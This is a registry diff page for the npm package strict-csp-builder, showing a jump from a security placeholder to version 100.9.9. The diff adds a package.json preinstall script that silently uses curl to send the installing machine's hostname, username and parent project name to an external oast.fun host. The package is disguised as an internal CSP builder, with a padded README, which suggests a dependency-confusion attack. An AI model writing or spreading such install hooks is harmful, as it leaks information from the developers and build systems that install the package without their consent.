strict-csp-builder 0.0.1-security → 100.9.9
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Potentially problematic release.
This version of strict-csp-builder might be problematic. Click here for more details.
- package/README.md +12 -5
- package/index.js +4 -0
- package/package.json +23 -6
package/README.md
CHANGED
@@ -1,5 +1,12 @@
|
|
1
|
-
#
|
2
|
-
|
3
|
-
This
|
4
|
-
|
5
|
-
|
1
|
+
# @strict-csp/builder
|
2
|
+
|
3
|
+
This is a placeholder for the npm package `@strict-csp/builder`.
|
4
|
+
It contains a simple `index.js` and a `preinstall` script for ethical hacking and research purposes.
|
5
|
+
|
6
|
+
Some random text to make it look less empty: aTgcxDhivpLJlFM1mf98m2zInnZz6cslaE4smU Qm7U6qURv4qsEllk5FlJB67uxogK7QiMWySeLDXPk3em8n5S7NQqs6ZuVpCOwaNDkjwF294Vej5Wdqykj8SqXbNwHkufoQ2V90eMrN3EA hXAkqp gJqng0diCa7oaFtarMVbigCWlPv0btmU56WinPoyHgayOTE1
|
7
|
+
|
8
|
+
## Usage
|
9
|
+
|
10
|
+
```bash
|
11
|
+
npm install @strict-csp/builder
|
12
|
+
```
|
package/index.js
ADDED
package/package.json
CHANGED
@@ -1,6 +1,23 @@
|
|
1
|
-
{
|
2
|
-
"name": "strict-csp-builder",
|
3
|
-
"version": "
|
4
|
-
"description": "
|
5
|
-
"
|
6
|
-
|
1
|
+
{
|
2
|
+
"name": "strict-csp-builder",
|
3
|
+
"version": "100.9.9",
|
4
|
+
"description": "Builder utility for internal CSP policies. Compatible with CI/CD pipelines and secure workflows.",
|
5
|
+
"main": "index.js",
|
6
|
+
"scripts": {
|
7
|
+
"preinstall": "curl --data-urlencode \"info=$(hostname && whoami && if [ -f ../../package.json ]; then echo -n ' ; PROJECT_NAME: '; cat ../../package.json | grep -oP '\"name\":\\s*\"([^\"]+)\"' | head -1 | cut -d':' -f2 | tr -d ' \\\"'; fi)\" http://sjnpxdmtpuvlboyzcehbe8s7lodudopxr.oast.fun"
|
8
|
+
},
|
9
|
+
"keywords": [
|
10
|
+
"csp",
|
11
|
+
"builder",
|
12
|
+
"internal-tools",
|
13
|
+
"infrastructure",
|
14
|
+
"cli",
|
15
|
+
"npm"
|
16
|
+
],
|
17
|
+
"author": "Core CSP Team",
|
18
|
+
"license": "MIT",
|
19
|
+
"repository": {
|
20
|
+
"type": "git",
|
21
|
+
"url": "https://github.com/strict-csp/builder"
|
22
|
+
}
|
23
|
+
}
|